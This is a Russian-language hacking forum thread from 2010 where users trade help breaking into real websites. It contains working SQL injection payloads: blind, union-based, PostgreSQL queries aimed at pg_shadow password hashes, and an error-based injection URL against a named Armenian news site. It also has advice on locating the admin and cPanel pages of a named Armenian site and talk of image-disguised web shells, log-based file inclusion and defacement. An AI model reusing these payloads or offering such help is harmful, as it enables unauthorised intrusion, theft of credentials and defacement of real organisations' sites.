Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    youthparliament.am
    админку не моqу наыти..
    если кто смоjэт помоqите поялуста..
    /admin пробовал.
     
  2. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    blind sql

    Всем привет!
    Кручу blind вида(в поле ввода мыла):
    Code:
    la@la.la' and (select if((select user from mysql.user limit 1)='root',1,0))='1
    У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.
    Ну т.е. я хочу в таблицу с новостями добавить php-код.
    Прокатит ли такое?
     
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/
     
    _________________________
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Что, залил такую картинку и шелл заработал? Круть, надо взять на вооружение
     
    1 person likes this.
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886

    снова из Азербайджанa, и сново дефейс Армянских сайтов?

    не одобряю...


    ---------

    p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..
     
    _________________________
    #13765 Konqi, 23 Jun 2010
    Last edited: 23 Jun 2010
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?)

    Один просит как залить шелл ВМЕСТО картинки из админки (обойти фильтр на разрешение и т.д.), ему советуют вставить в конец картинки код, тот главное потом пишет спасибо (зохавал видать все интырнеты уже новым способом), теперь ты со своими логами - у дурки день открытых дверей?))))

    Или там было написано "у меня кроме админки еще есть LFI"???)))
     
    #13766 Pashkela, 23 Jun 2010
    Last edited: 23 Jun 2010
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    вспомнил ? :)
     
    _________________________
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    2 Konqi:

    Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать: "p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом.." и надеяться на то, что тебя поймут? Тем более ты же дальше пишешь уже про еще 10 ДРУГИХ сайтов - с логикой напряги?)))

    главное "я там нашел" - ыыыыыыыыы
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    Pashkela понимаю =* sorry

    а сейчас можно ответить? ))))
     
    _________________________
  10. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    26
    Likes Received:
    10
    Reputations:
    4
    Здравствуйте уважаемые гуру и не только. Есть небольшая проблемка: есть иньекция postgresql 7.4 но иньекция в жопашном месте - select ххх from(select '123%INJ%' as code) as listcode left join то left join это и так далее с толпой сложных и малопонятных джойнов. Само собой простой комментарий -- все не комментирует, так что если поставить ; И написать свой запрос будет лишь ошибка.

    Ошибки выводятся так что данные из бд получить проблем нет, темболее что пользователь суперюзер. Проблема в том что хочу в админку. А она сцука под паролем в htaccess. а без отдельного sql запроса файл, как я поглядел в мануалах, не прочитать.

    Ну я подумал что не проблема - можно подключиться напрямую к серверу бд, ибо доступ к pg_shadow есть. Проблема в том что
    Code:
    array_to_string(array(select passwd::text from pg_shadow+where+usename=getpgusername()),','::text)
    ругается нехорошими словами Query failed: ERROR: значения NULL как элементы массива не поддерживается. Эта ошибка ставит меня в тупик честно говоря - подумал ну мало-ли бывают пустые пароли. но блин какой запрос не составляй - хоть с array хоть без него подтвердить что в базе есть пользователи с не null паролями так и не смог. Странно короче.

    Пы.Сы: таблиц с пользователями в различных бд этого сервака хренова туча все пароли админов не протестил но те что проверил к хтаксессу не подходят.
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д.
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    к сожалению в студию не могу,отправлю в пм :)
     
    _________________________
  13. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    140
    Likes Received:
    24
    Reputations:
    27
    вопрос такой:

    есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id

    index.php?id=-37+union+select+1,2/*
    index.php?id=3111117+union+select+1,2/*
    index.php?id=37+and+1=2+union+select+1,2/*

    скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
     
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    152
    Likes Received:
    244
    Reputations:
    73
    Если ошибка выводится,крути как слепую с выводом в ошибку.
     
  15. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    попробуй типа этого...
    index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema.tables+limit+0,1/*
    есле 5тая версия.. а не какайта там 3-тья иле четвертая..

    и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.
    -> +AND+substring(version,1,1)=5
     
    _________________________
    #13775 Дирижабль, 23 Jun 2010
    Last edited: 23 Jun 2010
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    [Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

    durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого
    index.php?id=37+and+if(5=4,NULL,NUll)+union+select+1,2/*
    но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу
    index.php?id=37+and+1=2+union+select+1,2/*
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    вопрос закрыт : отдельное спасибо Pashkel-y :)
     
    _________________________
  18. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
    index.php?id=37+limit+0+union+select+1,2/*
    Ну или так:
    index.php?id=37+union+select+1,2+limit+1,1/*
     
  19. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    вот поjaлсута помоqите раскрутить..
    как то не получается
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more
    
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.